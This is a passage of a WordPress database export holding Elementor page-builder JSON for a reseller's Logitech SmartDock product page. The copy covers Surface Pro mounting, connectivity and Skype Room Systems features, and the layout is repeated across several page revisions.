Windows\\u00ae 10 Skype meeting app.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f09081\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1222d0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"868fa53\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c500ae9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"30eb069\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b14b9de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c996fe6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/EqZbHTEVfvA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"cdc9177\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"333fa79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>PERFECT FOR SKYPE FOR BUSINESS<\\/p><p>Logitech SmartDock meeting room solution, designed for Microsoft Skype\\u00ae for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc04271\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1c378bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a4beb86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURELY LOCKS SURFACE PRO<\\/h3><p>SmartDock is an AV control console and powered mount with Kensington\\u00ae security slot for added protection. Confidently leave a Surface\\u00ae Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6b27b08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3bfea6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock.jpg\",\"id\":3034}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458aa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4d634bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a9587d9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.jpg\",\"id\":3035}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2644878\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"88f77cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADDS CONNECTIVITY WITHOUT CLUTTER<\\/h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1e3e62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9afb26a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"afc2bb6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SIMPLIFIES CONTENT SHARING<\\/h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4df46a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dcde8ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-2.jpg\",\"id\":3036}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"705260b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ece995b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2a41a9a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-3.jpg\",\"id\":3037}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0ed16d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d03f27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPLETE THE EXPERIENCE<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e3a52b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cdc1fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"145cf08\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b612093\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"491e24c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"67df618\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4f33f87\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM<\\/h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5358850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65020ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXTENDED I\\/O FOR SURFACE PRO<\\/h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1283944\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bbe9fd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ENERGY-SAVING HIBERNATION<\\/h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ad2c4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7a14c34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT<\\/h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cebd381\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"498ce51\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"64b49a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SUPERIOR CABLE MANAGEMENT<\\/h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7bd1a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a733024\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY ACCESS TO ROOM AV<\\/h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the room\\u2019s camera, speakerphone, and display accessible to a user\\u2019s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40d4a0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"80afd57\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6062,3031,'_elementor_version','0.4'),(6064,3039,'_wp_page_template','template-fullwidth.php'),(6065,3039,'_elementor_edit_mode','builder'),(6066,3039,'_elementor_template_type','post'),(6067,3039,'_elementor_data','[{\"id\":\"e24bb76\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"49cb1ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"22c9bdb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK<\\/h2><p>Secure meeting room console designed for Skype Room Systems<\\/p><ul><li>Securely mount Surface\\u2122 Pro in any conference room<\\/li><li>Start your Skype for Business meeting with one-touch join<\\/li><li>Add connectivity without clutter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bc9889\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6b5486\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.png\",\"id\":3033}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5300311\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"185d208\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12eaaab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK MAKES SKYPE ROOMS EASY<\\/h2><p>Add video collaboration to any room with Logitech\\u00ae SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed Windows\\u00ae 10 Skype meeting app.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f09081\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1222d0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"868fa53\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c500ae9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"30eb069\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b14b9de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c996fe6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/EqZbHTEVfvA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"cdc9177\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"333fa79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SKYPE FOR BUSINESS<\\/h3><p>Logitech SmartDock meeting room solution, designed for Microsoft Skype\\u00ae for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc04271\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1c378bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a4beb86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURELY LOCKS SURFACE PRO<\\/h3><p>SmartDock is an AV control console and powered mount with Kensington\\u00ae security slot for added protection. Confidently leave a Surface\\u00ae Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6b27b08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3bfea6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock.jpg\",\"id\":3034}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458aa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4d634bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a9587d9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.jpg\",\"id\":3035}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2644878\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"88f77cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADDS CONNECTIVITY WITHOUT CLUTTER<\\/h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1e3e62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9afb26a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"afc2bb6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SIMPLIFIES CONTENT SHARING<\\/h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4df46a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dcde8ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-2.jpg\",\"id\":3036}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"705260b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ece995b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2a41a9a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-3.jpg\",\"id\":3037}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0ed16d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d03f27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPLETE THE EXPERIENCE<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e3a52b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cdc1fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"145cf08\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b612093\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"491e24c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"67df618\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4f33f87\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM<\\/h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5358850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65020ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXTENDED I\\/O FOR SURFACE PRO<\\/h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1283944\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bbe9fd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ENERGY-SAVING HIBERNATION<\\/h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ad2c4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7a14c34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT<\\/h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cebd381\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"498ce51\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"64b49a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SUPERIOR CABLE MANAGEMENT<\\/h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7bd1a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a733024\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY ACCESS TO ROOM AV<\\/h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the room\\u2019s camera, speakerphone, and display accessible to a user\\u2019s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40d4a0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"80afd57\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6068,3039,'_elementor_version','0.4'),(6071,3040,'_wp_page_template','template-fullwidth.php'),(6072,3040,'_elementor_edit_mode','builder'),(6073,3040,'_elementor_template_type','post'),(6074,3040,'_elementor_data','[{\"id\":\"e24bb76\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"49cb1ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"22c9bdb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK<\\/h2><p>Secure meeting room console designed for Skype Room Systems<\\/p><ul><li>Securely mount Surface\\u2122 Pro in any conference room<\\/li><li>Start your Skype for Business meeting with one-touch join<\\/li><li>Add connectivity without clutter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bc9889\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6b5486\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.png\",\"id\":3033}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5300311\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"185d208\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12eaaab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK MAKES SKYPE ROOMS EASY<\\/h2><p>Add video collaboration to any room with Logitech\\u00ae SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed Windows\\u00ae 10 Skype meeting app.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f09081\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1222d0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"868fa53\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c500ae9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"30eb069\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b14b9de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c996fe6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/EqZbHTEVfvA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"cdc9177\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"333fa79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SKYPE FOR BUSINESS<\\/h3><p>Logitech SmartDock meeting room solution, designed for Microsoft Skype\\u00ae for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc04271\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1c378bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a4beb86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURELY LOCKS SURFACE PRO<\\/h3><p>SmartDock is an AV control console and powered mount with Kensington\\u00ae security slot for added protection. Confidently leave a Surface\\u00ae Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6b27b08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3bfea6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock.jpg\",\"id\":3034}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458aa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4d634bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a9587d9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.jpg\",\"id\":3035}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2644878\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"88f77cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADDS CONNECTIVITY WITHOUT CLUTTER<\\/h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1e3e62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9afb26a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"afc2bb6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SIMPLIFIES CONTENT SHARING<\\/h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal 